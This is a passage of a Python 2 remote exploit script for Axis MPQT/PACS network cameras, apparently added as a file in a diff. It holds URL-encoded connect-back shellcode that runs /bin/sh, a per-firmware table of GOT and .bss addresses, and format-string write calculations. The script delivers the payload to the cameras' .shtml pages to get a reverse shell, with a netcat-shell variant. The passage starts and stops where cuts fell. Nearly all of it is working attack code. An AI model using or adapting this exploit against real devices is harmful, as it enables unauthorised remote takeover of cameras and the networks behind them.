$r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%43%a2" # moveq 3,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # dup(0) already in socket + #dup(1) + "%6f%aa" # move.d [$acr],$r10 + "%41%b2" # moveq 1,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #dup(2) + "%6f%aa" # move.d [$acr],$r10 + "%42%b2" # moveq 2,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #execve("/bin/sh",NULL,NULL) + "%90%e2" # subq 16,$sp + "%6e%96" # move.d $sp,$r9 + "%6e%a6" # move.d $sp,$10 + "%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%e9%ab" # move.d $r10,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%10%e2" # addq 16,$sp + "%6e%f6" # move.d $sp,$acr + "%6e%96" # move.d $sp,$r9 + "%6e%b6" # move.d $sp,$r11 + "%7c%86" # clear.d $r12 + "%4b%92" # moveq 11,$r9 + "%3d%e9" # break 13 + ], '') + + + if self.target == 'MIPSel': + return MIPSel + elif self.target == 'ARMel': + return ARMel + elif self.target == 'CRISv32': + return CRISv32 + elif self.target == 'NCSH1': + return NCSH + elif self.target == 'NCSH2': + return NCSH + else: + print "[!] Unknown shellcode! (%s)" % str(self.target) + sys.exit(1) + + +class FMSdb: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def FMSkey(self,target): + self.target = target + + target_db = { + +#----------------------------------------------------------------------- +# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) +#----------------------------------------------------------------------- + +# +# Using POP format string, AKA 'Old Style' +# + # MPQT + 'MIPS-5.85.x': [ + 0x41f370, # Adjust to GOT free() address + 0x420900, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.40.3': [ + 0x41e41c, # Adjust to GOT free() address + 0x4208cc, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.4x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x42097c, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.5x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.55x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 11, # 1st POP's + 9, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.6x': [ + 0x41d048, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + + ], + + # MPQT + 'MIPS-5.7x': [ + 0x41d04c, # Adjust to GOT free() address + 0x41f718, # .bss shellcode address + 2, # 1st POP's + 14, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.75x': [ + 0x41c498, # Adjust to GOT free() address + 0x41daf0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.8x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e740, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.9x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e750, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.1x': [ + 0x41c480, # Adjust to GOT free() address + 0x41dac0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.2x': [ + 0x41e578, # Adjust to GOT free() address + 0x41fae0, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.20x': [ + 0x41d0c4, # Adjust to GOT free() address + 0x41e700, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.3x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x420a78, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.1x': [ + 0x41e268, # Adjust to GOT free() address + 0x420818, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + +# +# Tested with execstack to set executable stack flag bit on bin's and lib's +# +# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. +# + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.50x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1e7c8, # .bss shellcode address + 93, # 1st POP's + 1, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.55x': [ # + 0x1c15c, # Adjust to GOT free() address + 0x1e834, # .bss shellcode address + 59, # 1st POP's + 80, # 2nd POP's + 'axis', # Aligns injected code + 800, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + +# +# Using direct parameter access format string, AKA 'New Style' +# + # MPQT + 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) + 0x1c1b4, # Adjust to GOT free() address + 0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.2x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.4x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'ARM-NCSH-5.5x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.6x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.7x': [ # + 0x1c1c0, # Adjust to GOT free() address + 0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 132, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # Will go in endless loop after exit of nc shell... DoS sux + # MPQT + 'ARM-NCSH-5.8x': [ # + 0x1b39c, # Adjust to GOT free() address + 0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 98, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-6.1x': [ # + 0x1d2a4, # Adjust to GOT free() address +# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 106, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'CRISv32-5.5x': [ # + 0x8d148, # Adjust to GOT free() address + 0x8f5a8, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.4x': [ # + 0x8d0e0, # Adjust to GOT free() address + 0x8f542, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.2x': [ # + 0x8d0b4, # Adjust to GOT free() address + 0x8f4d6, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.20.0': [ # + 0x8d0e4, # Adjust to GOT free() address + 0x8f546, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ] + + + } + + if self.target == 0: + return target_db + + if not self.target in target_db: + print "[!] Unknown FMS key: %s!" % self.target + sys.exit(1) + + if self.verbose: + print "[Verbose] Number of availible FMS keys:",len(target_db) + + return target_db + + +# +# Validate correctness of HOST, IP and PORT +# +class Validate: + + def __init__(self,verbose): + self.verbose = verbose + + # Check if IP is valid + def CheckIP(self,IP): + self.IP = IP + + ip = self.IP.split('.') + if len(ip) != 4: + return False + for tmp in ip: + if not tmp.isdigit(): + return False + i = int(tmp) + if i < 0 or i > 255: + return False + return True + + # Check if PORT is valid + def Port(self,PORT): + self.PORT = PORT + + if int(self.PORT) < 1 or int(self.PORT) > 65535: + return False + else: + return True + + # Check if HOST is valid + def Host(self,HOST): + self.HOST = HOST + + try: + # Check valid IP + socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP + # Or we check again if it is correct typed IP + if self.CheckIP(self.HOST): + return self.HOST + else: + return False + except socket.error as e: + # Else check valid DNS name, and use the IP address + try: + self.HOST = socket.gethostbyname(self.HOST) + return self.HOST + except socket.error as e: + return False + + + +if __name__ == '__main__': + +# +# Help, info and pre-defined values +# + INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis ]' + HTTP = "http" + HTTPS = "https" + proto = HTTP + verbose = False + noexploit = False + lhost = '192.168.0.1' # Default Local HOST + lport = '31337' # Default Local PORT + rhost = '192.168.0.90' # Default Remote HOST + rport = '80' # Default Remote PORT + # Not needed for the SSI exploit, here for possible future usage. +# creds = 'root:pass' + creds = False + +# +# Try to parse all arguments +# + try: + arg_parser = argparse.ArgumentParser( +# prog=sys.argv[0], + prog='axis-ssid-PoC.py', + description=('[*]' + INFO + '\n')) + arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') + arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') + arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') + arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') + arg_parser.add_argument('--fms', required=False, help='Manual FMS key') + if creds: + arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') + arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') + arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') + arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') + arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') + args = arg_parser.parse_args() + except Exception as e: + print INFO,"\nError: %s\n" % str(e) + sys.exit(1) + + # We want at least one argument, so print out help + if len(sys.argv) == 1: + arg_parser.parse_args(['-h']) + + print "\n[*]",INFO + + if args.verbose: + verbose = args.verbose + + # Print out info from dictionary + if args.dict: + target = FMSdb(rhost,verbose).FMSkey(0) + print "[db] Number of FMS keys:",len(target) + + # Print out detailed info from dictionary + if verbose: + + print "[db] Target details of FMS Keys availible for manual xploiting" + print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]" + + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] == 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6] + + print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]" + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] != 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6] + + print "\n" + else: + print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:" + Key = "" + for tmp in range(0,len(target)): + Key += sorted(target.keys())[tmp] + Key += ', ' + print '\n',Key,'\n' + sys.exit(0) + +# +# Check validity, update if needed, of provided options +# + if args.https: + proto = HTTPS + if not args.rport: + rport = '443' + + if creds and args.auth: + creds = args.auth + + if args.noexploit: + noexploit = args.noexploit + + if args.rport: + rport = args.rport + + if args.rhost: + rhost = args.rhost + + if args.lport: + lport = args.lport + + if args.lhost: + lhost = args.lhost + + # Check if LPORT is valid + if not Validate(verbose).Port(lport): + print "[!] Invalid LPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if RPORT is valid + if not Validate(verbose).Port(rport): + print "[!] Invalid RPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if LHOST is valid IP or FQDN, get IP back + lhost = Validate(verbose).Host(lhost) + if not lhost: + print "[!] Invalid LHOST" + sys.exit(1) + + # Check if RHOST is valid IP or FQDN, get IP back + rhost = Validate(verbose).Host(rhost) + if not rhost: + print "[!] Invalid RHOST" + sys.exit(1) + + +# +# Validation done, start print out stuff to the user +# + if noexploit: + print "[i] Test mode selected, no exploiting..." + if args.https: + print "[i] HTTPS / SSL Mode Selected" + print "[i] Remote target IP:",rhost + print "[i] Remote target PORT:",rport + print "[i] Connect back IP:",lhost + print "[i] Connect back PORT:",lport + + rhost = rhost + ':' + rport + +# +# FMS key is required into this PoC +# + if not args.fms: + print "[!] FMS key is required!" + sys.exit(1) + else: + Key = args.fms + print "[i] Trying with FMS key:",Key + +# +# Prepare exploiting +# + # Look up the FMS key in dictionary and return pointer for FMS details to use + target = FMSdb(rhost,verbose).FMSkey(Key) + + if target[Key][6] == 'NCSH1': + NCSH1 = target[Key][6] + NCSH2 = "" + elif target[Key][6] == 'NCSH2': + NCSH2 = target[Key][6] + NCSH1 = "" + else: + NCSH1 = "" + NCSH2 = "" + + if Key == 'ARM-NCSH-5.8x': + print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n" + sys.exit(0) + + print "[i] Preparing shellcode:",str(target[Key][6]) + + # We don't use url encoded shellcode with Netcat shell + # This is for MIPS/CRISv32 and ARM shellcode + if not NCSH1 and not NCSH2: + FMSdata = target[Key][4] # This entry aligns the injected shellcode + + # Building up the url encoded shellcode for sending to the target, + # and replacing LHOST / LPORT in shellcode to choosen values + + # part of first 500 decoded bytes will be overwritten during stage #2, and since + # there is different 'tailing' on the request internally, keep it little more than needed, to be safe. + # Let it be 0x00, just for fun. + FMSdata += '%00' * target[Key][5] + + # Connect back IP to url encoded + ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) + ip_hex = ip_hex.split() + IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; + + # Let's break apart the hex code of LPORT into two bytes + port_hex = hex(int(lport))[2:] + port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) + port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) + port_hex = port_hex.split() + + if (target[Key][6]) == 'MIPSel': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%ff" + PP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'CRISv32': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + else: + print "[!] Unknown shellcode! (%s)" % str(target[Key][6]) + sys.exit(1) + + # Replace LHOST / LPORT in URL encoded shellcode + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("IP1",IP1) + shell = shell.replace("IP2",IP2) + shell = shell.replace("IP3",IP3) + shell = shell.replace("IP4",IP4) + shell = shell.replace("PP0",PP0) + shell = shell.replace("PP1",PP1) + FMSdata += shell + +# +# Calculate the FMS values to be used +# + # Get pre-defined values + ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS +# POP_SIZE = 8 + POP_SIZE = 1 + + GOThex = target[Key][0] + BSShex = target[Key][1] + GOTint = int(GOThex) + + # 'One-Write-Where-And-What' + if not NCSH1 and not NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) + + BSSint = int(BSShex) + BSSint = (BSSint - GOTint - ALREADY_WRITTEN) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint + + # 'Two-Write-Where-And-What' using "New Style" + elif NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + + # Calculate SecondWhat value, so it always is 0x20300 + SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + FirstWhat = FirstWhat - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + + # 'Two-Write-Where-And-What' using "Old Style" + elif NCSH1: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # FirstWhat writes with 4 bytes (Y) (0x0002YYYY) + # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) + if BSShex > 0x10000: + MSB = 1 + else: + MSB = 0 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) + + # Calculate SecondWhat value, so it always is 0x203[00] or [01] + SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + GOTint = GOTint - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + else: + print "[!] NCSH missing, exiting" + sys.exit(1) +# +# Let's start the exploiting procedure +# + +# +# Stage one +# + if NCSH1 or NCSH2: + + # "New Style" needs to make the exploit in two stages + if NCSH2: + FMScode = do_FMS(rhost,verbose) + # Writing 'FirstWhere' and 'SecondWhere' + # 1st request + FMScode.AddADDR(GOTint) # Run up to free() GOT address + # + # 1st and 2nd "Write-Where" + FMScode.AddDirectParameterN(POP1) # Write 1st Where + FMScode.Add("XX") # Jump up two bytes for next address + FMScode.AddDirectParameterN(POP2) # Write 2nd Where + FMSdata = FMScode.FMSbuild() + else: + FMSdata = "" + + print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + else: + print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + + # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM + # Actually, any valid and public readable .shtml file will work... + # (One of the two below seems always to be usable) + # + # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two + # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url + # + try: + target_url = "/httpDisabled.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/httpDisabled.shtml?&http_user=" + + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except urllib2.HTTPError as e: + if e.code == 404: + print "[<] Error",e.code,e.reason + target_url = "/view/viewer_index.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/view/viewer_index.shtml?&http_user=" + print "[>] Using alternative target shtml" + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except Exception as e: + if not NCSH2: + print "[!] Shellcode delivery failed:",str(e) + sys.exit(1) +# +# Stage two +# + +# +# Building and sending the FMS code to the target +# + print "[i] Building the FMS code..." + + FMScode = do_FMS(rhost,verbose) + + # This is an 'One-Write-Where-And-What' for FMS + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x0 | @0x7e818dbc -> [POP1's] + # 0x0 | @0x7e818dc0 -> [free () GOT address] + # 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n) + # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] + # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] + # 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n) + # 0x1 | @0x7e818dd4 + # + if not NCSH1 and not NCSH2: + FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's + FMScode.AddADDR(GOTint) # GOT Address + FMScode.AddWRITEn(1) # 4 bytes Write-Where +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's + FMScode.AddADDR(BSSint) # BSS shellcode address + FMScode.AddWRITEn(1) # 4 bytes Write-What +# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) + + # End of 'One-Write-Where-And-What' + + + # This is an 'Two-Write-Where-And-What' for FMS + # + # Netcat shell and FMS code in same request, we will jump to the SSI function + # We jump over all SSI tagging to end up directly where "xxx" will + # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) + # + # The Trick here is to write lower target address, that we will jump to when calling free(), + # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT + # address with two LSB writes. + # + elif NCSH2: + # + # Direct parameter access for FMS exploitation are really nice and easy to use. + # However, we need to exploit in two stages with two requests. + # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...) + # + # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) + # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to. + # + # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1", + # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write. + # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] + # + # Stack Example: + # + # Stack content | Stack address (ASLR) + # + # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818dc8 | + # 0x76f3d70c | @0x7e818dcc | + # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two] + # 0x1 | @0x7e818dd4 + # [....] + # 0x1c154 | @0x7e818e10 + # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One] + # 0x76f41fb8 | @0x7e818e18 | + # 0x76f3d70c | @0x7e818e1c | + # 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two] + # 0x1 | @0x7e818e24 + # + + FMScode.Add(shell) + + # + # 1st and 2nd "Write-Where" already done in stage one + # + # 1st and 2nd "Write-What" + # + FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. + FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) + FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) + FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation + + elif NCSH1: + # Could use direct argument addressing here, but I like to keep "old style" as well, + # as it's another interesting concept. + # + # Two matching stack contents -> stack address in row w/o or max two POP's between, + # is needed to write two bytes higher (MSB). + # + # + # Stack Example: + # + # Stack Content | @Stack Address (ASLR) + # + # 0x9c | @7ef2fde8 -> [POP1's] + # [....] + # 0x1 | @7ef2fdec -> [GOTint address] + #------ + # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] + # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) + # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] + # ------ | | + # [....] -> [POP3's] | | + # 0x7fb99dc | @7ef2fe7c | | + # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] + # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) + # -> [POP4's] | + # (nil) | @7ef2fe88 | [Count up to 0x20300] + # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) + + FMScode.Add(shell) + + # Write FirstWhere for 'FirstWhat' + FMScode.AddPOP(POP1) + FMScode.AddADDR(GOTint) # Run up to free() GOT address + 